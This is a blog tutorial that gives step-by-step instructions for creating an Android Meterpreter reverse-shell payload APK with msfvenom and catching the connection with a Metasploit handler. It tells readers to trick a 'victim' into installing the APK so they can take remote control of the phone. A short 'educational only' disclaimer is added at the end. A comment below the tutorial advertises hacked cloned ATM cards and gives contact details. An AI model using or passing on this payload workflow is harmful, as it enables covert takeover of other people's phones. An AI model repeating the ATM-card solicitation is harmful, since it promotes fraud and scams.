CREATING A PAYLOAD USING METASPLOIT
Hey guys!! Today, I am gonna explain you how to create a Payload using Kali Linux Terminal.
In this tutorial, we are going to use the best and wellknown framework. I hope you guess it, Yes! that is Metasploit Framework. It is one of the best framework among all the frameworks.
What is Metasploit Framework ?
The Metasploit Framework is an open source penetration testing and development platform that provides exploits for a variety of applications, operating systems and platforms. Metasploit is one of the most commonly used penetration testing tools and comes built-in to Kali Linux.
Requirements:
1. Pc with Kali Linux installed in it.
Lets get started:
1. Now open your Kali Linux Terminal !
2. Use the following Command to create a payload using Metasploit:
sudo msfvenom -p android/meterpreter/reverse_tcp LHOST=157.46.254.10 LPORT=4444 R>payload.apk
(There is no new line in this command)
Here:
- -p = It means we're creating a payload
- LHOST = your ip address [if you dont know your ip adress, type sudo ifconfig then copy the ipv4 and paste at LHOST]
- LPORT = we have to use 4444 port because that port is not specifed.
- Payload = payload.apk is the name of the your apk
So after entering this command the payload will be created in your Desktop
3. You need to send this apk to the victim and this depends on you how creatively you send this payload to the victim and make him install and open it!!
4. Now you need to access that apk for that open new terminal and type the following commands
(NOTE:This process should be done after opening the apk by the victim)
msfconsole
(type the commands one by one dont type all at once)
4.now we will access our created payload by the following command
use exploit/multi/handler
5. We'll have to setup our payload by typing
> set payload android/meterpreter/reverse_tcp
6. Now set some options like LHOST and LPORT
> set LHOST <your ip>
> set LPORT 4444
7. Now type:
exploit
8. You will get meterpreter connection from the victim. Here you will get the access over that android.
10. If u dont know commands type ? so now you get lots of commands
11. Here is demonstration. I will try with a command to check the root.
check_root
HOORAY!! You have hacked an android using payload !!
NOTE: This post in only for Educational process. Dont misuse it !!!
Author :- Sandeep
I was searching for loan to sort out my bills& debts, then i saw comments about a programmed cloned ATM card that can be used to hack and withdraw money from any ATM machines around you . I doubted at first but thus decided to give it a try by contacting {skylinktechnes@yahoo.com} they responded with their guidelines on how the card works. I was assured that the card can withdraw $5,000 instant per day & was credited with $50,000 so i requested for one & paid the delivery fee to obtain the card, i was shocked to see the UPS agent in my resident with a parcel{card} i signed and went back inside and confirmed the card work's after the agent left. This is no doubts because i have the card & has made used of the card. This hackers are USA based hackers set out to help people with financial freedom!! Contact these email if you wants to get rich with this Via email skylinktechnes@yahoo.com whatsapp/t: +1(213)785-1553
ReplyDelete